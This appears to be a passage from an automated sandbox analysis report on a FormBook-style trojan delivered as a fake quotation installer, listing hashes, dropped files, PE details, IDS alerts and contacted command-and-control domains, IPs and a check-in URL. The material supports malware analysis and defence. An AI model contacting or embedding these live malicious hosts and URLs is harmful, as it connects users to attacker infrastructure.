	QUOTE110.exe	Get hash	malicious	Browse	www.coolestpornreviews.com/vcd/?YVMtapH=LyDxHldb+KlOSDua8YCOPwjDVdjcS2dbW4Dz7bHlFL8lQur/HOk9HtLfSHz2pyKhCdo+&BB=Lzr4TtmpAHX4

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	Payment Slip.exe	Get hash	malicious	Browse	198.54.117.211
	RFQ9003930 New Order.doc	Get hash	malicious	Browse	198.54.117.215
	PURCHASE ORDER I 5083.exe	Get hash	malicious	Browse	198.54.117.218
	RgproFrlyA.exe	Get hash	malicious	Browse	198.54.117.218
	INVOICE.exe	Get hash	malicious	Browse	198.54.117.211
	NEW ORDER RE PO88224.PDF.EXE	Get hash	malicious	Browse	198.54.117.212
	doc0490192021092110294.exe	Get hash	malicious	Browse	198.54.117.211
	SWIFT Transfer 103_0034OTT21000123_8238174530.PDF.exe	Get hash	malicious	Browse	198.54.117.210
	SYsObQNkC1.exe	Get hash	malicious	Browse	198.54.117.216
	SBGW#001232021.exe	Get hash	malicious	Browse	198.54.117.217
	DHL_Sender_Documents_Details_021230900.xlsx	Get hash	malicious	Browse	198.54.117.215
	invoice.exe	Get hash	malicious	Browse	198.54.117.210
	onxyPs4yG1MUPbN.exe	Get hash	malicious	Browse	198.54.117.211
	85fX3YfW9S.exe	Get hash	malicious	Browse	198.54.117.215
	Amended SO of 2000KVA400KVA.exe	Get hash	malicious	Browse	198.54.117.210
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	198.54.117.217
	Z14S9Zolcyub1pd.exe	Get hash	malicious	Browse	198.54.117.210
	sprogr.exe	Get hash	malicious	Browse	198.54.117.215
	EWVNnyXoRS.exe	Get hash	malicious	Browse	198.54.117.212
	aT8aer3ybNvYpl3.exe	Get hash	malicious	Browse	198.54.117.215

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CNSERVERSUS	SUPPLY_PRICE_ORDER_9978484DF.exe	Get hash	malicious	Browse	23.225.139.107
	8LdKQIRfZG	Get hash	malicious	Browse	41.216.185.141
	vHLDOsbYKA	Get hash	malicious	Browse	41.216.185.113
	LAKmNB72J8	Get hash	malicious	Browse	156.255.31.131
	xUAaxUb8FS	Get hash	malicious	Browse	23.225.119.147
	17Rom1F3MY	Get hash	malicious	Browse	156.251.245.93
	DHL_Sender_Documents_Details_021230900.xlsx	Get hash	malicious	Browse	154.208.173.230
	invoice.exe	Get hash	malicious	Browse	172.247.0.173
	#U9488#U5bf9#U57ab#U4ed8#U517c#U804c#U5f00#U5355#U5341#U4e2a#U79d8#U8bc0.exe	Get hash	malicious	Browse	172.247.15.222
	invoice attachment.docm	Get hash	malicious	Browse	172.83.155.147
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	154.210.71.233
	Quotation & Sample Designs.PDF.exe	Get hash	malicious	Browse	154.210.71.233
	cJHhmOyf4o.exe	Get hash	malicious	Browse	154.208.173.151
	MFtBYsz3kB.exe	Get hash	malicious	Browse	154.210.74.237
	EIElnDxX0V.exe	Get hash	malicious	Browse	154.208.173.230
	77dsREO8Me.exe	Get hash	malicious	Browse	23.225.30.174
	TsHIdFKafF	Get hash	malicious	Browse	23.224.58.165
	Wire transfer.exe	Get hash	malicious	Browse	103.61.30.44
	Vrd8Yqy7kn.exe	Get hash	malicious	Browse	172.83.155.173
	fk8YZet4QU	Get hash	malicious	Browse	156.251.171.249

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\4gyujazywsbdaoe Download File
Process:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
File Type:	data
Category:	dropped
Size (bytes):	216882
Entropy (8bit):	7.993293156280056
Encrypted:	true
SSDEEP:	6144:71sLVyecy+1K1bqg5pcPtdi+wSagdVBFJ6uQgVd0kI:71DdIqg5pcji+a6VLJ6vP
MD5:	F3364C6B2D2FBE79DF14059B0A45B326
SHA1:	2102737F5438F054621A71528044F38FF9CB82BC
SHA-256:	CA7D46A32EC12479AFEEC23562BD199C91D2DC0912462250D1A3811A7E89BE83
SHA-512:	A43EBC1C5975D7A44E9901EED45EADC53B7427FCF7C13A725BE782A972728AF038C92AE0CC954AE705C3EA93F2EB3A37208CD9FB6237B7F5B6899275AA211A27
Malicious:	false
Reputation:	low
Preview:	rV.RW.%......8.Y...Q.y.....k..+.k......D.n..0...u.h..s.t...\...).U...w...F;....?.g.......e@.(.=...\|.B...K..U'.....m...#U>K:\......~.t.G`N9Gz.......Is.....[.r.E./m/."..[Y....?.#UI=s..o...q.......i..>q...........Q....U1:Sn.ye.,.d.od...T..K`.%..%..@..e..@.R._......O.f..+........D.nl.0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]......[Y..\.]&.#...P..o...q..<^]..i.=[9........4h.Q......:Sn.ye.,.d@od..0T..K5.f..%.......@.R....'..O...+.k......D.n..0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]/."..[Y....]l.#.RoP..o...q..<^]..i.=[q........4h.Q......:Sn.ye.,.d@od..0T..K5.f..%.......@.R....'..O...+.k......D.n..0...u.h..s.t...\..=..m.$V..-I.....6......L.}.N.....;.'l..Ix.tr.5...\|..+...m....H.5.....8.sw6.Qc.....:.......T.9........m"]/."..[Y....]l.#.RoP..o...q..<^]..i.=[q........4h.Q...

C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll Download File
Process:	C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48128
Entropy (8bit):	6.182711541286411
Encrypted:	false
SSDEEP:	768:1Zi08T7N8+MHPofNnsG7NthUO33gg5Yyn91tMyuuVaRCNLBk0e67y9OLuiSuMwGA:/8T7N8CnhV/1e67y9O9IKoSJCPQRAli3
MD5:	0560BA80E8AFE7F5D83EB600602AB426
SHA1:	A783F03BC76EE70833D61D69D854674F45D5A223
SHA-256:	19013D7428A659774231FD4B5213A463EEAB58A0C347DADFAA95536BD89D3F13
SHA-512:	A034974DC569DB8064B9BC5699E33B188C581E716862FED95708A1B2CAACCAA6AE8EE4F4F23989C68EF838EA71271423501B6AEA27A9C216AF9DB9745356B12C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......sE..7$.C7$.C7$.CDF.B6$.CDF.B8$.C7$.C.$.CaQ.B6$.CaQ.B6$.CaQ.C6$.CaQ.B6$.CRich7$.C................PE..L....QRa...........!.....j...N............................................................@.............................H...D.......................................................................................................................text...ah.......j.................. ..`.bss.....................................rdata...............n..............@..@.data....4.......6...\|..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.911190489576227
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PRICE_REQUEST_QUOTATION.exe
File size:	267109
MD5:	85589170af713a03ca622f94429c634a
SHA1:	4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256:	dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
SHA512:	1379d1dbed880c664d7314018e676970afd192a423e6144f3bac6b15e5f89fb4bc245adbe462046ccfb6692e0054be18b459bc2757e60d700c03758232682dd9
SSDEEP:	6144:F8LxBsicGu14h0W/c8aRyPwSagdVDgfpnYluQgVd0ka7cDp3:/USWDaRaa6VUBqvr03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.^...QF..QG.qQF.^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

File Icon


Icon Hash:	b2a88c96b2ca6a72

Static PE Info

General
Entrypoint:	0x40312a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007F3494B986C3h
push ebx
call 00007F3494B9B4A4h
cmp eax, ebx
je 00007F3494B986B9h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007F3494B9B420h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F3494B9869Dh
push 0000000Dh
call 00007F3494B9B478h
push 0000000Bh
call 00007F3494B9B471h
mov dword ptr [0042EC24h], eax
call dword ptr [00407038h]
push ebx
call dword ptr [0040726Ch]
mov dword ptr [0042ECD8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429058h
call dword ptr [0040715Ch]
push 0040915Ch
push 0042E420h
call 00007F3494B9B0A4h
call dword ptr [0040710Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007F3494B9B092h
push ebx
call dword ptr [00407144h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7524	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x9e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x27c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	False	0.670572916667	data	6.44065573436	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x12a2	0x1400	False	0.4455078125	data	5.0583287871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x25d18	0x600	False	0.458984375	data	4.18773476617	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x2f000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x9e0	0xa00	False	0.45390625	data	4.4968702957	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x37190	0x2e8	data	English	United States
RT_DIALOG	0x37478	0x100	data	English	United States
RT_DIALOG	0x37578	0x11c	data	English	United States
RT_DIALOG	0x37698	0x60	data	English	United States
RT_GROUP_ICON	0x376f8	0x14	data	English	United States
RT_MANIFEST	0x37710	0x2cc	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll	SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll	RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-08:05:19.560904	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49777	34.102.136.180	192.168.2.5
09/28/21-08:05:24.814123	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49781	109.106.246.165	192.168.2.5
09/28/21-08:05:30.271587	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139
09/28/21-08:05:30.271587	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139
09/28/21-08:05:30.271587	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49782	80	192.168.2.5	154.208.173.139

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:05:04.067344904 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.102034092 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.103749037 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.103997946 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.139599085 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.181961060 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.181983948 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:04.182142973 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.182204008 CEST	49775	80	192.168.2.5	35.246.6.109
Sep 28, 2021 08:05:04.216681004 CEST	80	49775	35.246.6.109	192.168.2.5
Sep 28, 2021 08:05:19.300103903 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.316984892 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.317112923 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.317270994 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.334214926 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.560904026 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.560933113 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:19.561083078 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.561106920 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.864124060 CEST	49777	80	192.168.2.5	34.102.136.180
Sep 28, 2021 08:05:19.883162975 CEST	80	49777	34.102.136.180	192.168.2.5
Sep 28, 2021 08:05:24.641971111 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.666409969 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.666549921 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.666732073 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.692986965 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814122915 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814173937 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814193964 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814209938 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814225912 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814241886 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814258099 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814275026 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814280033 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814291000 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814305067 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814312935 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814327002 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814328909 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:24.814415932 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.814600945 CEST	49781	80	192.168.2.5	109.106.246.165
Sep 28, 2021 08:05:24.838884115 CEST	80	49781	109.106.246.165	192.168.2.5
Sep 28, 2021 08:05:30.006370068 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.270998955 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.271218061 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.271586895 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.536212921 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.544342995 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:30.544578075 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.544688940 CEST	49782	80	192.168.2.5	154.208.173.139
Sep 28, 2021 08:05:30.809536934 CEST	80	49782	154.208.173.139	192.168.2.5
Sep 28, 2021 08:05:35.598473072 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.628887892 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:35.629040956 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.629242897 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:35.661778927 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.039222956 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.040755987 CEST	80	49783	185.107.56.60	192.168.2.5
Sep 28, 2021 08:05:36.040757895 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:36.043976068 CEST	49783	80	192.168.2.5	185.107.56.60
Sep 28, 2021 08:05:36.071099997 CEST	80	49783	185.107.56.60	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 08:03:27.087770939 CEST	65307	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:27.108354092 CEST	53	65307	8.8.8.8	192.168.2.5
Sep 28, 2021 08:03:40.388488054 CEST	64344	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:40.427949905 CEST	53	64344	8.8.8.8	192.168.2.5
Sep 28, 2021 08:03:59.919179916 CEST	62060	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:03:59.946070910 CEST	53	62060	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:18.782730103 CEST	61805	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:18.802819014 CEST	53	61805	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:28.598836899 CEST	54795	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:28.625983000 CEST	53	54795	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:36.769691944 CEST	49557	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:36.798791885 CEST	53	49557	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:43.480593920 CEST	61733	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:43.501585960 CEST	53	61733	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:53.894303083 CEST	65447	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:53.930164099 CEST	53	65447	8.8.8.8	192.168.2.5
Sep 28, 2021 08:04:58.961429119 CEST	52441	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:04:59.015763998 CEST	53	52441	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:04.024564028 CEST	62176	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:04.061494112 CEST	53	62176	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:09.217550993 CEST	59596	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:09.243758917 CEST	53	59596	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:18.349935055 CEST	65296	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:18.377109051 CEST	53	65296	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:19.275244951 CEST	63183	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:19.298926115 CEST	53	63183	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:20.236413956 CEST	60151	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:20.263622999 CEST	53	60151	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:24.617837906 CEST	56969	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:24.640343904 CEST	53	56969	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:29.822536945 CEST	55161	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:30.004734039 CEST	53	55161	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:35.557977915 CEST	54757	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:35.594989061 CEST	53	54757	8.8.8.8	192.168.2.5
Sep 28, 2021 08:05:41.055377007 CEST	49992	53	192.168.2.5	8.8.8.8
Sep 28, 2021 08:05:41.079232931 CEST	53	49992	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 28, 2021 08:04:53.894303083 CEST	192.168.2.5	8.8.8.8	0x1e47	Standard query (0)	www.appleluis.host	A (IP address)	IN (0x0001)
Sep 28, 2021 08:04:58.961429119 CEST	192.168.2.5	8.8.8.8	0xcff7	Standard query (0)	www.snackithalal.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:04.024564028 CEST	192.168.2.5	8.8.8.8	0x3c1c	Standard query (0)	www.patrickandmaxine.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:09.217550993 CEST	192.168.2.5	8.8.8.8	0x1c69	Standard query (0)	www.4-6-2.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:19.275244951 CEST	192.168.2.5	8.8.8.8	0xa4e2	Standard query (0)	www.teelandcompany.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:24.617837906 CEST	192.168.2.5	8.8.8.8	0x3623	Standard query (0)	www.nailsestetic.space	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:29.822536945 CEST	192.168.2.5	8.8.8.8	0x954b	Standard query (0)	www.futurodr.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:35.557977915 CEST	192.168.2.5	8.8.8.8	0x72a2	Standard query (0)	www.babeshotnud.com	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.055377007 CEST	192.168.2.5	8.8.8.8	0xe8f5	Standard query (0)	www.thenewtocsin.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 28, 2021 08:04:53.930164099 CEST	8.8.8.8	192.168.2.5	0x1e47	No error (0)	www.appleluis.host	appleluis.host		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:04:59.015763998 CEST	8.8.8.8	192.168.2.5	0xcff7	Name error (3)	www.snackithalal.com	none	none	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	www.patrickandmaxine.com	www35.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	www35.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:04.061494112 CEST	8.8.8.8	192.168.2.5	0x3c1c	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:09.243758917 CEST	8.8.8.8	192.168.2.5	0x1c69	Name error (3)	www.4-6-2.com	none	none	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:19.298926115 CEST	8.8.8.8	192.168.2.5	0xa4e2	No error (0)	www.teelandcompany.com	teelandcompany.com		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:19.298926115 CEST	8.8.8.8	192.168.2.5	0xa4e2	No error (0)	teelandcompany.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:24.640343904 CEST	8.8.8.8	192.168.2.5	0x3623	No error (0)	www.nailsestetic.space	nailsestetic.space		CNAME (Canonical name)	IN (0x0001)
Sep 28, 2021 08:05:24.640343904 CEST	8.8.8.8	192.168.2.5	0x3623	No error (0)	nailsestetic.space		109.106.246.165	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:30.004734039 CEST	8.8.8.8	192.168.2.5	0x954b	No error (0)	www.futurodr.com		154.208.173.139	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:35.594989061 CEST	8.8.8.8	192.168.2.5	0x72a2	No error (0)	www.babeshotnud.com		185.107.56.60	A (IP address)	IN (0x0001)
Sep 28, 2021 08:05:41.079232931 CEST	8.8.8.8	192.168.2.5	0xe8f5	No error (0)	www.thenewtocsin.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
